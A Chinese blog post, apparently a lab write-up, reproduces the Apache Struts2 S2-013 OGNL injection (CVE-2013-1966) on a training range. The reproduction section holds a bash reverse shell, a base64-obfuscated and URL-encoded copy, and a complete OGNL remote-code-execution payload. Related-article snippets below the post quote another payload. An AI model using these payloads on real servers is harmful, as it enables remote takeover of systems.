[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)

最新推荐文章于 2024-03-07 17:48:41 发布
最新推荐文章于 2024-03-07 17:48:41 发布
阅读量518 收藏 9
点赞数 11
分类专栏: 漏洞复现 春秋云境靶场 Struts 文章标签: apache struts java web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k5664524/article/details/135638614
版权

一、漏洞情况分析

2.3.14.2 之前的 Apache Struts 2 允许远程攻击者通过在 (1) URL 或 (2) A 标签中使用 includeParams 属性时未正确处理的特制请求执行任意 OGNL 代码。

二、漏洞复现

春秋云境.com

进入靶场

开始复现

 bash -i >& /dev/tcp/127.0.0.1/9999 0>&1
 base加密
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 url编码
 bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D
 /?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%2C%23b%3Dnew+java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew+java.io.BufferedReader%28%23b%29%2C%23d%3Dnew+char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23out.println%28new+java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D
 ​
 payload原型:
 /?a=${#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(new java.lang.String(#d)),#out.close()}

 api接入构造好的payload开启监听后执行

三、漏洞处置建议 

把靶场关了,跟漏洞说“白白吧”

free key
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013CVE-2013-1966
qq_51577576的博客
11-24 458
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)
weixin_30711917的博客
05-25 616
漏洞版本: Apache Group Struts 2.0.0 - 2.3.14 漏洞描述: CVE(CAN) ID: CVE-2013-1966 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。 Apache Struts2的s:a和s:url标签...
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
最新发布
zjl12344的博客
03-07 170
360众测靶场题库
S2-013的一次逐步复现分析
jary__D的博客
11-27 342
站在巨人的肩膀上,嚼烂了分析漏洞
Struts2 S2-013复现
ZJT6666666的博客
12-22 255
Struts2 S2-013复现
buuctf [struts2]s2-013
qq_1873822的博客
03-16 762
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1731
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
zr1213159840的博客
01-15 1382
首先查找到漏洞的相关利用信息,链接如下: https://vulhub.org/#/environments/struts2/s2-013/ 能看到poc如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea
0x19.Apache Struts2远程代码执行漏洞(S2-013)
qq_31679787的博客
09-27 295
通过构造payload执行命令; payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...
漏洞复现----33、Struts2/S2-013/S2-014
七天
06-29 472
文章目录一、漏洞原理二、环境启动三、漏洞复现四、S2-014 一、漏洞原理 S2-013Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,可以设置成如下值: 1、none - URL中不包含任何参数(默认) 2、get - 仅包含URL中的GET参数 3、all - 在URL中包含GET和POST参数此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 需要在JSP页面中将s:url、s:a标签中的includeP
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
CVE-2012-4969漏洞分析
02-29
CVE-2012-4969漏洞分析,详细的分析了该漏洞的造成原因!
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
CVE-2017-5638 是S2-045漏洞的官方CVE编号,这表明了它是一个被广泛认可的安全漏洞。当Struts2尝试解析非标准的MIME类型时,比如“multipart/form-data; boundary=----WebKitFormBoundary”这类格式,如果没有正确...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
struts2-core-2.3.31.jar
10-09
漏洞Apache Struts2S2-045)远程代码执行漏洞原理基本相同,均是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意...
Struts2漏洞检查工具2019版 V2.3.exe
01-16
S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内 S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 ...
CVE-2019-0230 s2-059 漏洞分析1
08-03
Apache Struts 框架中的 CVE-2019-0230 漏洞是远程代码执行(RCE)漏洞,影响范围为 Struts 2.0.0 - Struts 2.5.20。官方建议升级到 2.5.22 或更高版本。该漏洞的成因是 Struts 框架在强制时对分配给某些标记属性的...
S2-013远程执行代码(CVE-2013-1966)
m0_65150886的博客
01-09 427
Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者POST,就会显示具体请求参数内容。按照正常的需求,把参数urlEncode一下也就够了, 问题在于,struts把参数做了OGNL解析,导致OGNL表达式的执行。​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL。控制整个网站甚至控制服务器进一步内网渗透。
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞CVE-2013-1966
温氏效应
09-04 2619
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值